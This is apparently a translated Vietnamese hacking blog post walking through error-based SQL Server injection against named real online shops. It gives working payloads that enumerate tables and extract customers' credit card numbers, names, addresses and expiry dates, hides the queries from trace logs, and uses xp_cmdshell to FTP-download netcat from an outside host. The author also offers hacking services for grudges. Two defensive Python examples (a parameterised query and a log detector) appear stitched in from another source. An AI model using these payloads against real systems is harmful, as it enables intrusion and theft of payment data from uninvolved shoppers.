
http://www.buidao.com

12/7/09

[Hacking] SQL Injection knowledge (part 3)

UPLOADING NETCAT TO THE SERVER

http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == ">")

echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f

CHECKING WHETHER NETCAT WAS UPLOADED SUCCESSFULLY

http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840.

Hacking a shop through a SQL Server injection flaw

A quick introduction for everyone on hacking with SQL Server injection!

Hacking with the convert technique means, roughly, converting a string expression to int; this cannot be done and so produces an error message (there are shops where we don't receive the message, because value=hidden). So first, to hack a shop running on ODBC MS SQL Server 2000 or 7.0, you at least have to look over the source a bit, so that you know which method to hack with.
Here I only introduce the convert technique for pulling out error messages; if you want to hack the whole server, that is a long story...

Detail:
Search on whichever search engines you like; there are many search engines people commonly use, such as
www.google.com or www.froogle.google.com
www.av.com
www.alltheweb.com
yahoo.com
...
ok----search for: allinurl: "/shop/viewproduct.asp", or you can search with the keyword allinurl: "/shop/index.asp" (these keywords have not been confirmed to be accurate, since they return very many sites that are not ODBC MS SQL databases, hic, but usually JSP (Java Server Pages) or JET, or VB.NET/.NET, and this takes some effort on your part in testing).
ok
once you have targets, pick one at random, e.g.:

http://www.mcmessentials.com.au/shop…0&categoryid=5

okay, now that we have a target, let's start testing it

http://www.mcmessentials.com.au/shop/viewp…tegoryid=5'

If its database is built on ODBC MS SQL Server, you will get the following message

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.

/shop/include/viewproduct.asp, line 3

okay, otherwise you will see nothing, or you will have to look at the source to find out.

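The quote probe above gets a response because the page concatenates the raw parameter into its SQL and then sends the ODBC driver's own error text back to the browser. The following is an added example, not code from the original post, contrasting that pattern with a parameterised lookup that returns only a generic message. sqlite3 stands in for the SQL Server/ODBC stack of the post; the products table, its rows and the function names are constructed for the demo.

```python
"""Added example (not from the original post): a concatenated lookup that leaks
the driver's error beside a parameterised one that does not.
sqlite3 is a stand-in for the SQL Server/ODBC stack; table and rows are constructed."""
import sqlite3


def make_db():
    """Constructed in-memory database with a tiny products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "Widget"), (5, "Gadget")])
    return conn


def vulnerable_lookup(conn, product_id):
    """Builds the statement by string concatenation, as the ASP page in the post
    does, and echoes the raw driver error to the client.
    A trailing quote (e.g. "5'") turns into a syntax error that names the driver."""
    try:
        sql = "SELECT name FROM products WHERE id = " + product_id
        row = conn.execute(sql).fetchone()
        return ("ok", row[0] if row else None)
    except sqlite3.Error as exc:
        return ("error", str(exc))


def hardened_lookup(conn, product_id):
    """Validates the type, binds the value as a parameter and never echoes
    driver errors; the client only ever sees a fixed message."""
    if not product_id.isdigit():
        return ("error", "Invalid request")  # the quote probe stops here
    try:
        row = conn.execute("SELECT name FROM products WHERE id = ?",
                           (int(product_id),)).fetchone()
        return ("ok", row[0] if row else None)
    except sqlite3.Error:
        # Log the exception server-side; the response carries no database detail.
        return ("error", "Invalid request")


if __name__ == "__main__":
    db = make_db()
    for probe in ("5", "5'"):
        print("vulnerable", repr(probe), vulnerable_lookup(db, probe))
        print("hardened  ", repr(probe), hardened_lookup(db, probe))
```

The vulnerable path is what the "Unclosed quotation mark" message above reveals: the quote reached the parser. The hardened path rejects the value before any SQL is built, and even a genuine database failure returns the same fixed text, so the error-based technique described later has no oracle to read from.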
ok, let's start finding tables

You can test with the following methods that I know of
Code:

;having 1=1--sp_password
'having 1=1--sp_password
"having 1=1--sp_password
(having 1=1--sp_password
)having 1=1--sp_password
(space)having 1=1--sp_password (%20 is a space, i.e. a blank)

Usually testing with the query (space)having 1=1--sp_password gets through ok
*Note one very necessary thing
1--%2b means the + sign, but passing a + directly gets filtered out by SQL; and you must have --sp_password to mask the log and avoid detection

http://www.mcmessentials.com.au/shop…1--sp_password

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'categories.label' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/shop/include/viewproduct.asp, line 9

We now know the table categories and the column label (the column label belongs to the table categories); next we will go and get all the tables

Now let's get the shop's user_name through the following query
%2bconvert(int,user_name())--sp_password
in full:

http://www.mcmessentials.com.au/shop…)--sp_password

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'braunshop' to a column of data type int.

/shop/include/viewproduct.asp, line 3

'braunshop' is the shop's user_name field
*Note
2--user_name() identifies the current user; if it is dbo then we are able to hack straight into the whole server without needing admin rights; if not, there are intermediate steps to take it over. ok, we will stop at getting CCs from the shop and not talk about taking over the whole server; the aim is mainly for everyone to learn and exchange experience, not to lure anyone into seriously harming anybody else, so I will only post up to the part about getting CCs. If anyone has a grudge against someone and wants to deface, grab passwords, get root, take the server or the host, contact me

ok, now we will get the tables on the column label one by one
Get the 1st table through the following query
Code:

%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password

in full:

http://www.mcmessentials.com.au/shop…)--sp_password

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'categorieslist' to a column of data type int.

/shop/include/viewproduct.asp, line 3

ok, table 1 is 'categorieslist'; to get the 2nd table you have to use where table_name not in('table1')

The query is as follows:

Code:

%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in('categorieslist')))--sp_password

http://www.mcmessentials.com.au/shop…)--sp_password

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'allorders' to a column of data type int.

/shop/include/viewproduct.asp, line 3

table 2 is 'allorders'
To get the 3rd table and the remaining tables, keep doing the same as for the 2nd table
Code:

%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in('categorieslist','allorders')))--sp_password

Here are all of the shop's tables just retrieved

Code:

'categorieslist','allorders','categories','categorymembers','deliveryZones','dtproperties','essorders','fullorder','keywords',
'optiongroupmembers','optiongroups','optiongroupslist','optionmembers','options','optionslist','orderoptions','orderoptions-options','orderproducts','orderproducts-products','orders','products','products-categories','products-options','searchresults','sysconstraints','syssegments'

ok, after getting all the tables you start getting the columns of the tables. There are 2 ways to get columns: 1 is to get all the columns, with no particular aim or in order to check the entire database; 2 is where we have already determined which table we need to get columns from, and then get them. I only get the columns of whichever table has CCs, 'allorders' or 'orders'
ok, let's get them
the query to get the first column is
1---get columns across all tables, regardless of which table they belong to, until there are none left; the query has the form
Code:

%2bconvert(int,(select top 1 column_name from information_schema.columns))--sp_password

once you have column1, use where column_name not in('column1') ok
2--get columns from a predetermined table
the query is as follows; for example I will get the columns of table orders

Code:

%2bconvert(int,(select top 1 column_name from information_schema.columns where table_name ='orders'))--sp_password

http://www.mcmessentials.com.au/shop…)--sp_password

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'orderid' to a column of data type int.

/shop/include/viewproduct.asp, line 3

the first column is 'orderid'
to get the 2nd column, add and column_name not in('orderid')

Code:

%2bconvert(int,(select top 1 column_name from information_schema.columns where table_name ='orders' and column_name not in('orderid')))--sp_password

http://www.mcmessentials.com.au/shop…)--sp_password

Code:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'created' to a column of data type int.

/shop/include/viewproduct.asp, line 3

and get all the columns of table 'orders' one by one

Once you have got all the columns of table 'orders', only the final and most interesting job is left, which is getting the CCs. Write a query to get the CCs based on all the columns you received; each shop has different database fields, but almost all shops found with the search allinurl: "/shop?viewproduct.asp" have only one single form of query, since I have tried them all, hehe, and every one works
you needn't bother rearranging it to write the query yourselves, I will just give it to you to play with

get the first cc

Code:

%2bconvert(int,(select%20top%201%20cardtype%2b'%20Name:'%2bcardname%2b'%20addr:%20'%2baddress%2b'%20suburb:%20'%2bsuburb%2b'%20state:%20'%2bstate%2b'%20zip:%20'%2bpostcode%2b'%20country:%20'%2bcountry%2b'%20phone:%20'%2bphone%2b'%20email:%20'%2bemail%2b'%20cardnumber:%20'%2bcardnumber%2b'%20expireymonth:%20'%2bexpirymonth%2b'%20year:%20'%2bexpiryyear%20from%20orders))--sp_password

to get the 2nd cc, add at the end ...from orders where cardnumber not in('first card number')
and get all the credit cards on there one by one
A shop like the one above is just for you to practise on and gain a bit more experience; this is only for learning, not intended to harm anyone.

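Every stage of this walkthrough, from the having 1=1 probe through the convert(int, ...) reads of information_schema and the orders table to the openrowset/xp_cmdshell upload at the top of the page, travels in the query string. The post's own remark that --sp_password is appended to mask the statement in SQL Server's trace (SQL Server does suppress the text of batches containing that token) is exactly why a defender should not rely on database-side logging alone: the web server's access log still records the full request. Below is an added detection example, not part of the original post, that URL-decodes the query field of IIS-style access log lines and tags each request with the stages it matches. The log lines, the reduced W3C field layout, the TEST-NET client addresses and the tag names are all constructed for this example.

```python
"""Added example (not from the original post): tag SQL-injection stages seen
in web-server access logs. Log lines are constructed in a reduced IIS W3C
layout (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) with
TEST-NET addresses; the tag names are this example's own choices."""
import re
from urllib.parse import unquote_plus

# Each tag maps to one stage of the technique described in the post.
SIGNATURES = {
    "probe_having":     re.compile(r"\bhaving\s+1\s*=\s*1"),
    "error_based_cast": re.compile(r"\bconvert\s*\(\s*int\s*,"),
    "schema_enum":      re.compile(r"\binformation_schema\.(tables|columns)\b"),
    "os_command":       re.compile(r"\bxp_cmdshell\b"),
    "linked_query":     re.compile(r"\bopenrowset\s*\("),
    "trace_evasion":    re.compile(r"\bsp_password\b"),
    "cardholder_data":  re.compile(r"\b(cardnumber|cardname|expir[iy]year|expirymonth)\b"),
}

# Constructed sample: one benign request, then requests shaped like the
# post's probe, schema enumeration, cardholder read and command execution.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2009-07-12 10:00:01 198.51.100.23 GET /shop/viewproduct.asp productid=10&categoryid=5 200",
    "2009-07-12 10:00:09 203.0.113.7 GET /shop/viewproduct.asp productid=10&categoryid=5%20having%201=1--sp_password 500",
    "2009-07-12 10:00:31 203.0.113.7 GET /shop/viewproduct.asp productid=10&categoryid=5%2bconvert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password 500",
    "2009-07-12 10:02:45 203.0.113.7 GET /shop/viewproduct.asp productid=10&categoryid=5%2bconvert(int,(select%20top%201%20cardnumber%20from%20orders))--sp_password 500",
    "2009-07-12 10:05:02 192.0.2.44 GET /FullStory.asp id=1;select%20*%20from%20openrowset('sqloledb','server=X;uid=Y;pwd=','exec%20master..xp_cmdshell%20%22dir%22')-- 500",
]


def normalise(query: str) -> str:
    """Decode URL encoding until the string is stable (covers %2b, %20 and
    double encoding), then lower-case and collapse whitespace so the
    signatures see plain SQL."""
    prev = None
    while prev != query:
        prev, query = query, unquote_plus(query)
    return re.sub(r"\s+", " ", query).lower()


def classify(query: str) -> list:
    """Return the list of stage tags matched by one query string."""
    text = normalise(query)
    return [tag for tag, rx in SIGNATURES.items() if rx.search(text)]


def scan_log(lines):
    """Return (client_ip, uri_stem, tags) for every request that matches a stage."""
    hits = []
    for line in lines:
        if not line or line.startswith("#"):
            continue
        parts = line.split(" ", 6)
        if len(parts) < 7:
            continue
        _date, _time, ip, _method, stem, query, _status = parts
        tags = classify(query)
        if tags:
            hits.append((ip, stem, tags))
    return hits


if __name__ == "__main__":
    for ip, stem, tags in scan_log(SAMPLE_LOG):
        print(ip, stem, ", ".join(tags))
```

Decoding until the result stops changing matters because the post writes every operator as %2b or %20 and a single pass would leave a second layer of encoding untouched. In practice the tags are most useful combined: a client whose requests progress from probe_having to schema_enum to cardholder_data, all with 500 responses, is the sequence this post describes end to end, and a 500 carrying a cardholder_data tag is the alert to page on.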
Link: http://phucjimy.wordpress.com/2008/04/02/ki%E1%BA%BFn-th%E1%BB%A9c-v%E1%BB%81-sql-injection-p3/